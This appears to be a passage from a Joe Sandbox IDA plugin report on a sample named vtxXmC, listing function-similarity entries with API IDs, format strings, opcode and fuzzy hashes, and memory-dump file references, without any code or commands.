                          • String ID: csm$f
                          • API String ID: 1543384424-629598281
                          • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                          • Instruction ID: fa796d30b5a922cca8df2527cadca46efd0e11325c261140cc4c356438ce6e0c
                          • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                          • Instruction Fuzzy Hash: 2C11DF66A187C185E711AF36E8892AD6664EB44FC0F0C8075EECC2BB46CE38D951C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: TimerWaitable
                          • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                          • API String ID: 1823812067-484248852
                          • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                          • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                          • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                          • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                          APIs
                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B039E0
                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B03A21
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                          • Instruction ID: c094a7921cee73de9344df31890d9729a7e9ed610c00b176b462ce203e0db6bf
                          • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                          • Instruction Fuzzy Hash: 55111976A18B8182EB628F25E84826DB7E5FB88B84F5C4270DACD17B58DF3DD5518B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: TimerWaitable
                          • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                          • API String ID: 1823812067-3336177065
                          • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                          • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                          • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                          • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                          • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                          • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                          • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710